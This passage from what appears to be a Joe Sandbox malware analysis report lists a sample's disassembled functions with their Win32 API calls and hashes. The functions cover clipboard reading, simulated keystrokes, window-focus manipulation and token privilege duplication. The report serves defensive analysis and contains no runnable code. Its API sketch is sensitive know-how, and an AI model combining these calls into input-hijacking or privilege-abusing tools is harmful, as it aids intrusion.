                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendTimeout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1599653421-0
                                                                                                                                                                  • Opcode ID: 82427e8d257702dfd5a0a18a0125d08c9bc04b912f99633b61be4ad4e813560a
                                                                                                                                                                  • Instruction ID: 7e77e41c13e9626308fe557b3ca75f8c681aa65106c71b07424d86527da40754
                                                                                                                                                                  • Opcode Fuzzy Hash: 82427e8d257702dfd5a0a18a0125d08c9bc04b912f99633b61be4ad4e813560a
                                                                                                                                                                  • Instruction Fuzzy Hash: 40D012F179020C7EFB008761DD0BDBB775CD721F81F008661BE06D64D1D6A49E198570
                                                                                                                                                                  Function 0021E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E1952
                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0021E3AA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1777923405-0
                                                                                                                                                                  • Opcode ID: 1f37a8102cba3773f67475dc355a260af0e9f015e9c73e881c805f2460c186ad
                                                                                                                                                                  • Instruction ID: 3b05bb635211bda056e1d53af07ef18040575f58ca3bd87220237816997053d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f37a8102cba3773f67475dc355a260af0e9f015e9c73e881c805f2460c186ad
                                                                                                                                                                  • Instruction Fuzzy Hash: 59D01235254160AAFE706F15FC06FD577969B40750F224499F581A70E5C7E25C915540
                                                                                                                                                                  Function 00236FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                                                  • Opcode ID: b829762de305fa6d01820604216b109d3c2bdf9b0c31d71fa2536f6a1b0265aa
                                                                                                                                                                  • Instruction ID: 89cd843f7edf029503e395255a78c01eeeff8d60de6557f04aba07a212acecd9
                                                                                                                                                                  • Opcode Fuzzy Hash: b829762de305fa6d01820604216b109d3c2bdf9b0c31d71fa2536f6a1b0265aa
                                                                                                                                                                  • Instruction Fuzzy Hash: 83D09E362105549F8701EF99ED48C8AB7E9FF5D7107418051F509DB271DB61FC509B90
                                                                                                                                                                  Function 001E4FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,002549DA,?,?,00000000), ref: 001E4FC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                  • Opcode ID: e56e241b05ad63dc86a9b5966f64f36f5ffccd0c0f314892179331798e9c65c8
                                                                                                                                                                  • Instruction ID: dd05e37a0326990dd9827a272db48b8596189d780f5b87c1a65c322a7362f260
                                                                                                                                                                  • Opcode Fuzzy Hash: e56e241b05ad63dc86a9b5966f64f36f5ffccd0c0f314892179331798e9c65c8
                                                                                                                                                                  • Instruction Fuzzy Hash: BDD0C97474020CBFEB00CB90DC4AF9A7BBCEB05718F200194F600A62D0D2F2BE409B55
                                                                                                                                                                  Function 00254DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  • Opcode ID: 1de9d3972154d2040a833bccc70b89759b073b2c6a806fb7b59ed4444cf05d47
                                                                                                                                                                  • Instruction ID: f872afcb4f867b1da3fb10ff980a61c2158c3dda58ef7e131ee67244279e8aa3
                                                                                                                                                                  • Opcode Fuzzy Hash: 1de9d3972154d2040a833bccc70b89759b073b2c6a806fb7b59ed4444cf05d47
                                                                                                                                                                  • Instruction Fuzzy Hash: A9D0C9B15002049BE7209F69E80875AB7E4AF40300F248829E6CA92151D7BAA8D29F51
                                                                                                                                                                  Function 00204129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wfsopen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                  • Instruction ID: 687bf2108a650524ed1af057f9ce752a22a694053937b82f148ed2bdc0735756
                                                                                                                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 99B092B244030C77CF012A82EC02A497B199B50664F008020FB0C181A2A673AAB09A89
                                                                                                                                                                  Function 001E50EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,001E50BE,?,001E5088,?,001EBE3D,002A22E8,?,00000000,?,001E3E2E,?,00000000,?), ref: 001E510C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  • Opcode ID: 2ba6021ac11148f78172bfca87a09299ffd028f009de1f2eadb010bb19dafdc0
                                                                                                                                                                  • Instruction ID: 507809ef6f55e5faebb0a21c75fc6a9d15b32b33e1a62c7967d4a700310ec069
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ba6021ac11148f78172bfca87a09299ffd028f009de1f2eadb010bb19dafdc0
                                                                                                                                                                  • Instruction Fuzzy Hash: 48E09275900E02CBC3354F1BA804416FBE6EEE13653218A2EE0E582660D7B054869BA0

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 0024F5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0024F64E
                                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0024F6AD
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024F6EA
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0024F711
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024F737
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 0024F7A3
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0024F7C4
                                                                                                                                                                  • GetKeyState.USER32(00000009), ref: 0024F7D1
                                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0024F7E7
                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0024F7F1
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0024F820
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024F843
                                                                                                                                                                  • SendMessageW.USER32(?,00001030,?,0024DE69), ref: 0024F940
                                                                                                                                                                  • SetCapture.USER32(?), ref: 0024F970
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024F9D4
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0024F9FA
                                                                                                                                                                  • ReleaseCapture.USER32 ref: 0024FA05
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024FA3A
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0024FA47
                                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0024FAA9
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FAD3
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0024FB12
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FB3D
                                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0024FB55
                                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0024FB60
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024FB81
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0024FB8E
                                                                                                                                                                  • GetParent.USER32(?), ref: 0024FBAA
                                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0024FC10
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FC40
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024FC96
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0024FCC2
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0024FCEA
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024FD0D
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024FD57
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0024FD87
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024FE1C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                                                  • API String ID: 3461372671-4164748364
                                                                                                                                                                  • Opcode ID: a4304347eddec8ca40eb456476105025afe39ba0f48d268972e978079e6b8a7a
                                                                                                                                                                  • Instruction ID: 6a9c2f320c41b1f92a40a9eec54a7141f5cfdf70495b9c7ed18b0e1950d17396
                                                                                                                                                                  • Opcode Fuzzy Hash: a4304347eddec8ca40eb456476105025afe39ba0f48d268972e978079e6b8a7a
                                                                                                                                                                  • Instruction Fuzzy Hash: B2320074614346AFDB58DF24D988EAABBE9FF88354F140629F665872B1CB70DC20CB41
                                                                                                                                                                  Function 0024A8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0024AFDB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                                                                  • Opcode ID: 98817d3d1a74d5feb174f8859384b0e92103e43dc51d66a72238143cb4851736
                                                                                                                                                                  • Instruction ID: aa789e1534a00a9f8a588f39b16d8614f8d373b29487b22e6935e9f3b68b4bc3
                                                                                                                                                                  • Opcode Fuzzy Hash: 98817d3d1a74d5feb174f8859384b0e92103e43dc51d66a72238143cb4851736
                                                                                                                                                                  • Instruction Fuzzy Hash: FD12F3B1A60349ABEB298F64DC49FAE7BB8FF45310F104119F51AEB1D1DBB08911CB12
                                                                                                                                                                  Function 001FF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 001FF796
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00254388
                                                                                                                                                                  • IsIconic.USER32(000000FF), ref: 00254391
                                                                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 0025439E
                                                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002543A8
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002543BE
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 002543C5
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 002543D1
                                                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002543E2
                                                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 002543EA
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 002543F2
                                                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 002543F5
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025440A
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254415
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025441F
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254424
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025442D
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254432
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0025443C
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00254441
                                                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00254444
                                                                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0025446B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                                                  • Opcode ID: 988c9d6548dd1f9189c5aa435292556709517dbdd17b6c291a67ad401c57f7ff
                                                                                                                                                                  • Instruction ID: 63636e19cb5be43db9d50c8ff8786eea3c70faed3bc365edf167f12465307c23
                                                                                                                                                                  • Opcode Fuzzy Hash: 988c9d6548dd1f9189c5aa435292556709517dbdd17b6c291a67ad401c57f7ff
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A3170B1F9021CBBEB216F71AC49F7F7E6CEB44B54F108025FA05AA1D0C6F05D51AAA4
                                                                                                                                                                  Function 00237099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenClipboard.USER32(0027DBF0), ref: 002370C3
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 002370D1
                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 002370D9
                                                                                                                                                                  • CloseClipboard.USER32 ref: 002370E5
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00237101
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0023710B
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00237120
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0023712D
                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 00237135
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00237142
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00237176
                                                                                                                                                                  • CloseClipboard.USER32 ref: 00237283
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3222323430-0
                                                                                                                                                                  • Opcode ID: 5257f4b9e9bf7d2ad3e45fc3b646d2f7986679ee3f40e6c98e2281e207e14bd7
                                                                                                                                                                  • Instruction ID: 0a7032596c56d8b34f4b1346412eac0d604d7badd7e7dd61b20624371e2995c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 5257f4b9e9bf7d2ad3e45fc3b646d2f7986679ee3f40e6c98e2281e207e14bd7
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C51E6B1318206ABD710EF61EC99F6F77A8AF94B00F004519F546D71D1DFB0D8158B62
                                                                                                                                                                  Function 0021B9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0021BF0F
                                                                                                                                                                    • Part of subcall function 0021BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0021BF3C
                                                                                                                                                                    • Part of subcall function 0021BEC3: GetLastError.KERNEL32 ref: 0021BF49
                                                                                                                                                                  • _memset.LIBCMT ref: 0021BA34
                                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0021BA86
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0021BA97
